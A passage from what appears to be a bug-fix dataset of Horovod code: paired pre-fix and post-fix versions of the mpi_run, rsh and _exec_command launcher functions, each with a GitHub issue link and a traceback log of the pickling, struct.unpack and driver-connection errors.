settings.binding_args if settings.binding_args else " ".join(impl_binding_args)
)
# Pass all the env variables to the mpirun command.
mpirun_command = (
"mpirun --allow-run-as-root --tag-output "
"-np {num_proc} {hosts_arg} "
"{binding_args} "
"{mpi_args} "
"{ssh_port_arg} "
"{tcp_intf_arg} "
"{nccl_socket_intf_arg} "
"{output_filename_arg} "
"{env} {extra_mpi_args} {command}".format( # expect a lot of environment variables
num_proc=settings.num_proc,
hosts_arg=hosts_arg,
binding_args=binding_args,
mpi_args=" ".join(mpi_impl_flags),
tcp_intf_arg=tcp_intf_arg,
nccl_socket_intf_arg=nccl_socket_intf_arg,
ssh_port_arg=ssh_port_arg,
output_filename_arg="--output-filename " + settings.output_filename
if settings.output_filename
else "",
env=" ".join(
"-x %s" % key
for key in sorted(env.keys())
if env_util.is_exportable(key)
),
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
command=" ".join(quote(par) for par in command),
)
)
if settings.verbose >= 2:
print(mpirun_command)
# we need the driver's PATH in env to run mpirun,
# env for mpirun is different to env encoded in mpirun_command
if "PATH" not in env and "PATH" in os.environ:
env = copy.copy(env) # copy env so we do not leak env modifications
env["PATH"] = os.environ["PATH"]
# Execute the mpirun command.
if settings.run_func_mode:
exit_code = safe_shell_exec.execute(
mpirun_command, env=env, stdout=stdout, stderr=stderr
)
if exit_code != 0:
raise RuntimeError(
"mpirun failed with exit code {exit_code}".format(exit_code=exit_code)
)
else:
os.execve("/bin/sh", ["/bin/sh", "-c", mpirun_command], env)
|
def mpi_run(settings, nics, env, command, stdout=None, stderr=None):
"""
Runs mpi_run.
Args:
settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
nics: Interfaces to include by MPI.
env: Environment dictionary to use for running command.
command: Command and arguments to run as a list of string.
stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
mpi_impl_flags, impl_binding_args = _get_mpi_implementation_flags(
settings.tcp_flag, env=env
)
if mpi_impl_flags is None:
raise Exception(_MPI_NOT_FOUND_ERROR_MSG)
ssh_port_arg = (
'-mca plm_rsh_args "-p {ssh_port}"'.format(ssh_port=settings.ssh_port)
if settings.ssh_port
else ""
)
# if user does not specify any hosts, mpirun by default uses local host.
# There is no need to specify localhost.
hosts_arg = "-H {hosts}".format(hosts=settings.hosts)
tcp_intf_arg = (
"-mca btl_tcp_if_include {nics}".format(nics=",".join(nics)) if nics else ""
)
nccl_socket_intf_arg = (
"-x NCCL_SOCKET_IFNAME={nics}".format(nics=",".join(nics)) if nics else ""
)
# On large cluster runs (e.g. Summit), we need extra settings to work around OpenMPI issues
if settings.num_hosts and settings.num_hosts >= _LARGE_CLUSTER_THRESHOLD:
mpi_impl_flags.append("-mca plm_rsh_no_tree_spawn true")
mpi_impl_flags.append(
"-mca plm_rsh_num_concurrent {}".format(settings.num_hosts)
)
binding_args = (
settings.binding_args if settings.binding_args else " ".join(impl_binding_args)
)
# Pass all the env variables to the mpirun command.
mpirun_command = (
"mpirun --allow-run-as-root --tag-output "
"-np {num_proc} {hosts_arg} "
"{binding_args} "
"{mpi_args} "
"{ssh_port_arg} "
"{tcp_intf_arg} "
"{nccl_socket_intf_arg} "
"{output_filename_arg} "
"{env} {extra_mpi_args} {command}".format( # expect a lot of environment variables
num_proc=settings.num_proc,
hosts_arg=hosts_arg,
binding_args=binding_args,
mpi_args=" ".join(mpi_impl_flags),
tcp_intf_arg=tcp_intf_arg,
nccl_socket_intf_arg=nccl_socket_intf_arg,
ssh_port_arg=ssh_port_arg,
output_filename_arg="--output-filename " + settings.output_filename
if settings.output_filename
else "",
env=" ".join(
"-x %s" % key
for key in sorted(env.keys())
if env_util.is_exportable(key)
),
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
command=" ".join(quote(par) for par in command),
)
)
if settings.verbose >= 2:
print(mpirun_command)
# we need the driver's PATH in env to run mpirun,
# env for mpirun is different to env encoded in mpirun_command
if "PATH" not in env and "PATH" in os.environ:
env = copy.copy(env) # copy env so we do not leak env modifications
env["PATH"] = os.environ["PATH"]
# Execute the mpirun command.
if settings.run_func_mode:
exit_code = safe_shell_exec.execute(
mpirun_command, env=env, stdout=stdout, stderr=stderr
)
if exit_code != 0:
raise RuntimeError(
"mpirun failed with exit code {exit_code}".format(exit_code=exit_code)
)
else:
os.execve("/bin/sh", ["/bin/sh", "-c", mpirun_command], env)
|
https://github.com/horovod/horovod/issues/2037
|
Traceback (most recent call last):
File "horovod/run/common/util/tiny_shell_exec.py", line 32, in execute
exit_code = safe_shell_exec.execute(command, env=env, stdout=output, stderr=output)
File "horovod/run/common/util/safe_shell_exec.py", line 183, in execute
middleman.start()
File "multiprocessing/process.py", line 105, in start
self._popen = self._Popen(self)
File "multiprocessing/context.py", line 284, in _Popen
return Popen(process_obj)
File "multiprocessing/popen_spawn_posix.py", line 32, in __init__
super().__init__(process_obj)
File "multiprocessing/popen_fork.py", line 19, in __init__
self._launch(process_obj)
File "multiprocessing/popen_spawn_posix.py", line 47, in _launch
reduction.dump(process_obj, fp)
File "multiprocessing/reduction.py", line 60, in dump
ForkingPickler(file, protocol).dump(obj)
AttributeError: Can't pickle local object '_createenviron.<locals>.encode'
|
AttributeError
|
def rsh(
driver_addresses,
key,
host_hash,
command,
env,
local_rank,
verbose,
background=True,
events=None,
):
"""
Method to run a command remotely given a host hash, local rank and driver addresses.
This method connects to the SparkDriverService running on the Spark driver,
retrieves all information required to connect to the task with given local rank
of that host hash and invoke the command there.
The method returns immediately after launching the command if background is True (default).
When background is set to False, this method waits for command termination and returns
command's result. If there is an exception while waiting for the result (i.e. connection reset)
it returns -1.
:param driver_addresses: driver's addresses
:param key: used for encryption of parameters passed across the hosts
:param host_hash: host hash to connect to
:param command: command and arguments to invoke
:param env: environment to use
:param local_rank: local rank on the host of task to run the command in
:param verbose: verbosity level
:param background: run command in background if True, returns command result otherwise
:param events: events to abort the command, only if background is True
"""
if ":" in host_hash:
raise Exception("Illegal host hash provided. Are you using Open MPI 4.0.0+?")
driver_client = driver_service.SparkDriverClient(
driver_addresses, key, verbose=verbose
)
task_indices = driver_client.task_host_hash_indices(host_hash)
task_index = task_indices[local_rank]
task_addresses = driver_client.all_task_addresses(task_index)
task_client = task_service.SparkTaskClient(
task_index, task_addresses, key, verbose=verbose
)
task_client.run_command(command, env)
if not background:
stop = None
events = events or []
for event in events:
stop = threading.Event()
on_event(event, task_client.abort_command, stop=stop)
try:
return task_client.wait_for_command_exit_code()
except:
traceback.print_exc()
return -1
finally:
if stop is not None:
stop.set()
|
def rsh(
driver_addresses,
key,
settings,
host_hash,
command,
env,
local_rank,
background=True,
events=None,
):
"""
Method to run a command remotely given a host hash, local rank and driver addresses.
This method connects to the SparkDriverService running on the Spark driver,
retrieves all information required to connect to the task with given local rank
of that host hash and invoke the command there.
The method returns immediately after launching the command if background is True (default).
When background is set to False, this method waits for command termination and returns
command's result. If there is an exception while waiting for the result (i.e. connection reset)
it returns -1.
:param driver_addresses: driver's addresses
:param key: used for encryption of parameters passed across the hosts
:param settings: settings
:param host_hash: host hash to connect to
:param command: command and arguments to invoke
:param env: environment to use
:param local_rank: local rank on the host of task to run the command in
:param background: run command in background if True, returns command result otherwise
:param events: events to abort the command, only if background is True
"""
if ":" in host_hash:
raise Exception("Illegal host hash provided. Are you using Open MPI 4.0.0+?")
driver_client = driver_service.SparkDriverClient(
driver_addresses, key, verbose=settings.verbose
)
task_indices = driver_client.task_host_hash_indices(host_hash)
task_index = task_indices[local_rank]
task_addresses = driver_client.all_task_addresses(task_index)
task_client = task_service.SparkTaskClient(
task_index, task_addresses, key, verbose=settings.verbose
)
task_client.run_command(command, env)
if not background:
stop = None
events = events or []
for event in events:
stop = threading.Event()
on_event(event, task_client.abort_command, stop=stop)
try:
return task_client.wait_for_command_exit_code()
except:
traceback.print_exc()
return -1
finally:
if stop is not None:
stop.set()
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def _exec_command_fn(driver_addresses, key, settings, env):
def _exec_command(command, slot_info, events):
host = slot_info.hostname
local_rank = slot_info.local_rank
verbose = settings.verbose
result = rsh(
driver_addresses,
key,
host,
command,
env,
local_rank,
verbose,
False,
events,
)
return result, time.time()
return _exec_command
|
def _exec_command_fn(driver_addresses, key, settings, env):
def _exec_command(command, slot_info, events):
host = slot_info.hostname
local_rank = slot_info.local_rank
result = rsh(
driver_addresses,
key,
settings,
host,
command,
env,
local_rank,
False,
events,
)
return result, time.time()
return _exec_command
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def _exec_command(command, slot_info, events):
host = slot_info.hostname
local_rank = slot_info.local_rank
verbose = settings.verbose
result = rsh(
driver_addresses, key, host, command, env, local_rank, verbose, False, events
)
return result, time.time()
|
def _exec_command(command, slot_info, events):
host = slot_info.hostname
local_rank = slot_info.local_rank
result = rsh(
driver_addresses, key, settings, host, command, env, local_rank, False, events
)
return result, time.time()
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
